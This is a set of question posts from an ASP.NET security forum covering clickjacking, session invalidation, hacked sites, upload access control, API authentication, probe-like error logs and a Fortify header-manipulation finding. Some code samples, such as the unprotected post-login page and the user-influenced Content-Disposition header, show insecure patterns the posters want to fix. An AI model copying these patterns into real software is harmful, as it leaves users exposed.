Script VS SSL

Script errorconfuses theSSL

We areFinalizing anASP.NETapplication withVisualStudio 2012 andFrameworkfor asp.net4.0;ComodoEssential SSLand the project isoperatingin WindowsServer2008 R2 WebEdition.

HTTP modeworks perfect. Https, so gooduntil we got to a page thathas severalboxes withhandles.The content is not displayedbecause the browserfreezes.

It seems to bea mixed content,https://developer.mozilla.org/en-US/docs/Security/MixedContent

Theperson who develops is unclear aboutwhether there needs tomanipulateIISS,IISS7stayoranyserver, or if it'scode... Ithink they arethe 2 things.

Theperson who develops not have much knowledgeor practical to configureservers.

Thanks forever...

Hi,

After running IBM appScan we received an issue  - "Session Not Invalidated After Logout". Any idea or suggestion on getting rid of this issue?

Thanks.

We had a third-party security audit and they found a bunch of things that needed to be corrected.  We fixed all of them, except for one.  They claim we still have a problem with Cross Frame Scripting and clickjacking.  The test put out login page within a frame in a page on a completely different website, which could be exploited.  While it is considered a low threat, my boss wants me to resolve this.

What we did originally was put this in the web.config:

<system.webServer>
<httpProtocol>
<customHeaders>
<add name="X-Frame-Options" value="SAMEORIGIN" />
</customHeaders>
</httpProtocol>
</system.webServer>

Apparently this doesn't cut it.  I've looked at other solutions but all I could find was to put JavaScript on every page (in our case in the MasterPage) that checks the frame origin, but I thought something like above would be a better solution.  Has anyone found a solution for this problem?

Hello,

We have a folder on a server where we allow the user to upload a document from the web page.

Currently 'Everyone' has permissions to access this folder.  Is there a specific account that can be use so that we only grant access to the internet users using the system so that the folder can be locked down to other users who may have access to the server and into the folders?

In other words, only the creator and those uploading to the folder via the web page, (and Administrator for the server) would be allowed to read items in this upload folder? 

Thanks for you time, Happy new year.

I have created and managed an asp.net website using C# through Visual Studio 2010 of our church denomination last year.

After few months it was hacked but the hacker doesnot seem to interfere the SQL database but they redirect or replace the front page to their created Islam praising contents. 

I have take the website down and report to the domain provider but he does not have any solution to the problem. He only knows about wordpress but since our old church website was done using php he was chose for the provider, after i take part in the commitee and since i want to use asp.net we told him and he dont know about windows based but gave us a space since we can manage the whole site.

It was like talking to a wall about the hacking. My question here is, "how vulnerable asp.net site is compared to wordpress websites?" ..He blamed me for not securing the codes and chosing asp.net. I dont really know how comes? I work in a company and all our website is just like this website but never hacked. Does it means our work website is secure only because no one hacked it. How can i improve the coding or asp.net website?

Please provide a cheap solution to resume our church website.. like a domain provider in our country (india). Is it possible to use the same domain name to other domain provider?

I am in the process of developing web API(ASP.net) for a mobile app. The app wants to do authentication based on mobile number. My idea is

1. The user registers using his mobile number (An API will be called)
2. On registration the user will be sent an OTP.
3. Once the user confirms the OTP I will validate it with server.
4. If the OTP is correct I will send an HMAC key to the mobile user.
5. This HMAC key will be specific to that user only.
6. For accessing the web API the mobile APP will generate a signature using mobile number, HMAC key and timestamp.

Now, my concern is that there is web based Admin panel as well which uses same web APIs, how would i do authentication for it? To use Admin panel the user has username and password. I am looking for common authentication process. Please advise what will be the best way to keep authentication common and is my approach correct.

I have a simple website form that take users' input and save that to a database.  (e.g., names and email). very basic information.

Recently, it fails Vulnerability scan and I am not sure what the vulnerability below meant. Please help!

Cross-Site Scripting (XSS), allowing arbitrary malicious content to run in a legitimate user's session, is possible via a website (login.xxx.mil) system (banner and acceptance page).

Thanks.

My asp.net site was hacked last week.  I found a user I never put there that had administrative privileges,  which I am pretty sure is how the site got sprinkled with a number of asp. php, and web.config files that were not supposed to be there, and also the main web.config file had been altered with a redirecting thingy.  The site uses asp.net controls for all queries (so they are parameterized), and has only aspx pages, and a couple of html pages.

The purpose of the hack was to redirect any links to my site generated by search engines to other sites.

I have cleaned out all the offending files and seem to have the site back in working order.

My site is low traffic -- maybe 50 visitors a day.  So it seems to be to be a lousy target for a hacker, which makes me conclude that it was likely some kind of automated hack. I can't believe an individual would have sorted through the site adding files here and there, and modifying some files. It just would not be worth their time.

My big question -- how would someone (or even more-so a bot) have been able to create a user with administrative privileges??

I'm thinking it is likely a host problem, but of course they say only my site has reported a hack.

Hi all, I'm not sure if this is the appropriate forum for my questions but here goes. Suppose I have an app that uses WCF to send and receive text messages and image files across the web, and the service needs to be able to go through firewalls. Based on those requirements,  I have just three  questions

  1 - Which binding should I use

  2 - What would be my best security option?

  3 - How do I make sure my data are secure? 

Thanks in advance for your reply.

The code below works with my AD account groups and the login page goes to the page i need (mysecurepage.aspx) after I login using the username and password from the AD group.

However, im having a bit of trouble securing the page in preventing the user from being able to access the page through its URL outside of the login. Can't find an answer for this can anybody assist?

 Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    End Sub
    Public Class AllowedADGroup
        Public GroupName As String
        Public AssociatedUserType As String
    End Class

    Public Function UserHasPreferencesAccess(ByVal UserName As String, ByVal Password As String) As Boolean 
        Dim result As Boolean = False
        Dim referringPageName As String = "mystring"
        Dim actualADGroups As List(Of String) = GetGroups(UserName, Password)

        Dim matchingAllowedADGroup As AllowedADGroup = ADgroupsContainAnAllowedGroup(referringPageName, actualADGroups)

        If matchingAllowedADGroup IsNot Nothing Then
            'has a valid group
            result = True
        End If
        Return result
    End Function
    Public Function GetGroups(UserName, password) As List(Of String)
        Dim domainName As String = IPGlobalProperties.GetIPGlobalProperties().DomainName
        Dim context As PrincipalContext = New PrincipalContext(ContextType.Domain, domainName) 
        Dim usr As UserPrincipal = UserPrincipal.FindByIdentity(context, UserName)

        Dim result As New List(Of String)

        'verify credentials first
        If context.ValidateCredentials(UserName, password) = True Then

            ' if found - grab its groups
            If Not usr Is Nothing Then
                Dim groups As PrincipalSearchResult(Of Principal)
              
                groups = usr.GetAuthorizationGroups()
             
                ' iterate over all groups
                For Each p As Principal In groups
                    ' make sure to add only group principals
                    If TypeOf (p) Is GroupPrincipal Then
                        result.Add((CType(p, GroupPrincipal).Name))
                    End If
                Next
            End If
        End If

        Return result

    End Function

    Private Function GetAllowedActiveDirectoryGroups(ByVal requestingProductName As String) As List(Of AllowedADGroup)
        Dim retval As New List(Of AllowedADGroup)

        Dim sqlCon As New SqlConnection(ConfigurationManager.ConnectionStrings("ConString").ConnectionString)
        Dim sqlCmd As New SqlCommand("Client.GetAllowedActiveDirectoryGroups", sqlCon)

        sqlCmd.CommandType = CommandType.StoredProcedure
        sqlCmd.Parameters.Add("@RequestingProductName", SqlDbType.VarChar, 50)
        sqlCmd.Parameters("@RequestingProductName").Value = requestingProductName

        sqlCon.Open()
        Dim sqlr As SqlDataReader = sqlCmd.ExecuteReader()

        While sqlr.Read()
            Dim newADGroup As New AllowedADGroup

            If Not sqlr.IsDBNull(0) Then newADGroup.GroupName = sqlr.GetString(0)
            If Not sqlr.IsDBNull(1) Then newADGroup.AssociatedUserType = sqlr.GetString(1)

            retval.Add(newADGroup)
        End While

        Return retval
    End Function


    Private Function ADgroupsContainAnAllowedGroup(ByVal nameOfCallingProduct As String, ByVal adGroups As List(Of String)) As AllowedADGroup
        Dim retVal As AllowedADGroup = Nothing

        Dim allowedADGroups As List(Of AllowedADGroup) = GetAllowedActiveDirectoryGroups(nameOfCallingProduct)

        'Check user's AD security groups include one that's allowed e.g. "myPreferenceUsers"
        For Each grp As String In adGroups
            For Each allowedGroup In allowedADGroups
                If String.Compare(grp, allowedGroup.GroupName, True) = 0 Then
                    retVal = allowedGroup
                    Exit For 'Exit inner for
                End If
            Next
            If Not retVal Is Nothing Then
                Exit For
            End If
        Next

        If retVal Is Nothing Then
           
        End If

        Return retVal
    End Function

    Protected Sub btnLogin_Click(sender As Object, e As EventArgs)
              If UserHasPreferencesAccess(txtUserName.Text, txtPassword.Text) Then
            Response.Redirect("~/mysecurepage.aspx")
        Else
            messagebox.Text = "Login failed. Please check your user name and password and try again."


        End If

    End Sub

I have my site set up to email me whenever an error happens, and recently I've been getting an occasional blast of about 50 notifications (once every day or two) about a page not found error, but the weird thing is that the error is for a domain other than my own. Here's an example of the error (my domain isn't ncbels.org). Each error is for a different URL on the same domain. Any idea what could be causing this?

I suspect my site is being used to probe/attack other domains somehow (do you agree?). I'm not sure how to track it down without more information. I searched all my site files for references to that domain, as well as any free text fields in my database, and didn't find anything. My hosting provider ran a scan on my site and said it came up clean. I don't see enough in the stack trace to see where it is coming from.

Error in page https://mail.ncbels.org/owa/auth/logon.aspx?url=https://mail.ncbels.org/owa/redir.aspx%3FC=FE3qhJWgt0aAfmzPSyMaLnaDWOIgz9II6y56Bd7eQcsZhVwlsvJ_kP3W-Npa6H92EX7JFA9UHDQ.%26URL=mailto%253aaritter%2540ncbels.org&reason=0

Message
The file '/owa/auth/logon.aspx' does not exist.

Trace
  CheckVirtualFileExists at offset 9984736 in file:line:column <filename unknown>:0:0 
  GetVPathBuildResultInternal at offset 475 in file:line:column <filename unknown>:0:0 
  GetVPathBuildResultWithNoAssert at offset 103 in file:line:column <filename unknown>:0:0 
  GetVirtualPathObjectFactory at offset 165 in file:line:column <filename unknown>:0:0 
  CreateInstanceFromVirtualPath at offset 43 in file:line:column <filename unknown>:0:0 
  GetHandlerHelper at offset 31 in file:line:column <filename unknown>:0:0 
  GetHandler at offset 37 in file:line:column <filename unknown>:0:0 
  System.Web.HttpApplication.IExecutionStep.Execute at offset 346 in file:line:column <filename unknown>:0:0 
  ExecuteStep at offset 155 in file:line:column <filename unknown>:0:0 

StackTrace
at System.Web.UI.Util.CheckVirtualFileExists(VirtualPath virtualPath) at System.Web.Compilation.BuildManager.GetVPathBuildResultInternal(VirtualPath virtualPath, Boolean noBuild, Boolean allowCrossApp, Boolean allowBuildInPrecompile, Boolean throwIfNotFound, Boolean ensureIsUpToDate) at System.Web.Compilation.BuildManager.GetVPathBuildResultWithNoAssert(HttpContext context, VirtualPath virtualPath, Boolean noBuild, Boolean allowCrossApp, Boolean allowBuildInPrecompile, Boolean throwIfNotFound, Boolean ensureIsUpToDate) at System.Web.Compilation.BuildManager.GetVirtualPathObjectFactory(VirtualPath virtualPath, HttpContext context, Boolean allowCrossApp, Boolean throwIfNotFound) at System.Web.Compilation.BuildManager.CreateInstanceFromVirtualPath(VirtualPath virtualPath, Type requiredBaseType, HttpContext context, Boolean allowCrossApp) at System.Web.UI.PageHandlerFactory.GetHandlerHelper(HttpContext context, String requestType, VirtualPath virtualPath, String physicalPath) at System.Web.UI.PageHandlerFactory.GetHandler(HttpContext context, String requestType, String virtualPath, String path) at System.Web.HttpApplication.MaterializeHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

Query String
url=https%3a%2f%2fmail.ncbels.org%2fowa%2fredir.aspx%3fC%3dFE3qhJWgt0aAfmzPSyMaLnaDWOIgz9II6y56Bd7eQcsZhVwlsvJ_kP3W-Npa6H92EX7JFA9UHDQ.%26URL%3dmailto%253aaritter%2540ncbels.org&reason=0

User Name


Source
System.Web

Help


Error Code
-2147467259

Form Data

Here's another batch of errors so you can see the volume. This is another URL I don't own:

Error in page https://www.themav.com/ts/en-US/c0d1f425f1bc189b.aspx - Message The file '/ts/en-US/c0d1f425f1bc189b.aspx' does not exist. Trace
Error in page https://www.themav.com/ts/en-US/Default.aspx - Message The file '/ts/en-US/Default.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/ts/en-US/9ce13f177b52ebe4.aspx - Message The file '/ts/en-US/9ce13f177b52ebe4.aspx' does not exist. Trace
Error in page https://www.themav.com/store/2acedb3a3f01e5dd.aspx - Message The file '/store/2acedb3a3f01e5dd.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/store/268d393ed863bc30.aspx - Message The file '/store/268d393ed863bc30.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/store/ShoppingCart.aspx - Message The file '/store/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/shoppingcart/f88b8c524dfd5180.aspx - Message The file '/shoppingcart/f88b8c524dfd5180.aspx' does not exist. Trace
Error in page https://www.themav.com/shopping/5a996c38b3c098b8.aspx - Message The file '/shopping/5a996c38b3c098b8.aspx' does not exist. Trace
Error in page https://www.themav.com/shoppingcart/be5f69491555a7db.aspx - Message The file '/shoppingcart/be5f69491555a7db.aspx' does not exist. Trace
Error in page https://www.themav.com/shopping/08ea539bb182f405.aspx - Message The file '/shopping/08ea539bb182f405.aspx' does not exist. Trace
Error in page https://www.themav.com/shoppingcart/ShoppingCart.aspx - Message The file '/shoppingcart/ShoppingCart.aspx' does not exist. Trace
Error in page https://www.themav.com/pages/154ef6207d723d24.aspx - Message The file '/pages/154ef6207d723d24.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/pages/9c64906843289a9f.aspx - Message The file '/pages/9c64906843289a9f.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/shopping/ShoppingCart.aspx - Message The file '/shopping/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/pages/ShoppingCart.aspx - Message The file '/pages/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/order/8d0c5dacfa52ff67.aspx - Message The file '/order/8d0c5dacfa52ff67.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/order/ShoppingCart.aspx - Message The file '/order/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/estore/35efd689838d088b.aspx - Message The file '/estore/35efd689838d088b.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/order/1de65df28d6aa5c8.aspx - Message The file '/order/1de65df28d6aa5c8.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/cart/d6fe3be2c41a1bc2.aspx - Message The file '/cart/d6fe3be2c41a1bc2.aspx' does not exist. Trace CheckVirtualFileExists

Thanks!

In my analytics, I'm seeing hits to my websites.

Many of them are government IP addresses such as the DOD (Department of Defense)

I also have this information that I don't understand

[ipv4 address block not managed by the ripe ncc]

What is this?  Should I be concerned?  

Hello,

I am getting System.Security.SecurityException when setting .NET Trust Level toHigh in IIS (version 8.0), please refer to below screenshot for further error details. I am using .NET framework 4.0.

Web Application is working fine in Full .NET Trust Level. 

Below error is only appearing on the pages where I am using third party controlABCpdf and using our custom developed component to generate Dynamic Reports. 

Please suggest.

Hi,

I want to download the document from below mentioned URL. When i try to download directly in the IE URL, it will be asking username and password credential to open the document.

But, when i try to download through application i am getting below error.

"The remote server returned an error: (401) Unauthorized."

ASP.NET Code:

downloadbutton_click event

URIFile = http://sr1250kl.vrmnet.vrm.intranet/A1/servlet/Download?auth=basic&event_name=k1_view&_file=emparea&id=0000008763&version=01

Dim client As New WebClient()
client.Credentials = CredentialCache.DefaultCredentials
client.UseDefaultCredentials = True
client.Credentials = New NetworkCredential("XXXXXX", "XXXXXXX", "vrmnet.vrm.intranet")
Dim buffer As Byte() = client.DownloadData(URIFile )
Dim download As String = Encoding.ASCII.GetString(buffer)
Console.WriteLine(download)
Console.WriteLine("Download successful.")
Response.ContentType = "application/pdf"
Response.AddHeader("content-length", buffer.Length.ToString())
Response.BinaryWrite(buffer)

The above code is not working when i click the download button using above code. Error : "The remote server returned an error: (401) Unauthorized."

How to download the file..?

How to remove Server information in Http header programatically?i don't want to use Urlscan or any other tool

In Global.asax file Application_PreSendRequestHeaders event i have below code

Response.Headers.Remove("Server");

And i tried same thing in custom httphandler also,But some how it doesn't remove Server information.

How to fix this problem,from where else server information is pushing into Http response? 

Hi,

I have upload folder to upload document.

but if user knows the url of document he is able to access without login in web application.

Can it be possible to deny user to access it.

Note : there is no information maintain in database so that i can restrict them from database.

Hello,

I need to remove img tag also from GetSafeHtmlFragment function but it's not removing.

Does any one have idea how to remove to img tag? Is there any whitelist or black list?

Can we make our customize Blacklist for tags?

How do you run security checks on your mvc .net website to check for possible hacking loop holes.

I use TripleDes and Cryptography in C# to encrypt my text and then save it in a database. Now I want to be able to search for a single word in that encrypted text in the database. I thought that if I encrypt the word I want to search on, that I can use that encrypted word to search in my database (SQL Server with FREETEXT). But the encrypted string of the word doesn't apear at all in the entire encrypted text.

How can I achieve what I want namely, a user types in a word he want to look for and my database will return the found record. Encryption must remain in .NET though. I don't know how to create the identical encryption on the database.

protected void exportToExcelGv(object sender, EventArgs e)
        {

            string FileName = "\\" + System.Configuration.ConfigurationManager.AppSettings["DocuDir"] + "\\FXExposure_" + ddlFund.SelectedValue + ".xls";
            string FilePath = Server.MapPath("FXExpsure.aspx");
            string newPath = Path.GetDirectoryName(FilePath) + FileName;
            GridView excel = new GridView();

            DataTable dt = new DataTable();

            dt = (DataTable)Session["dtExcel"];
            try
            {
                dt.Columns.Add("Fund").SetOrdinal(0);
            }
            catch (Exception ex)
            {

            }

            for (int i = 0; i < dt.Rows.Count; i++)
            {
                if (ddlFund.SelectedValue == "All Funds")
                {
                    dt.Rows[i]["Fund"] = "All Funds";
                }
                else
                {
                    dt.Rows[i]["Fund"] = Session["FundName"];
                }
            }

            using (StreamWriter sw = new StreamWriter(newPath))
            {
                HtmlTextWriter hw = new HtmlTextWriter(sw);

                excel.DataSource = dt;

                excel.DataBind();
                excel.RenderControl(hw);
            }

            Response.ContentType = ContentType;
            Response.AppendHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(FileName));
            Response.WriteFile(newPath);
            Response.End();
        }

After using Fortify to analyze my code, Fortify identify this line of code:

Response.AppendHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(FileName));

is having a vulnerability 'header manipulation'

Can anyone help me resolve the issue i'm currently facing? 

Thank you so much!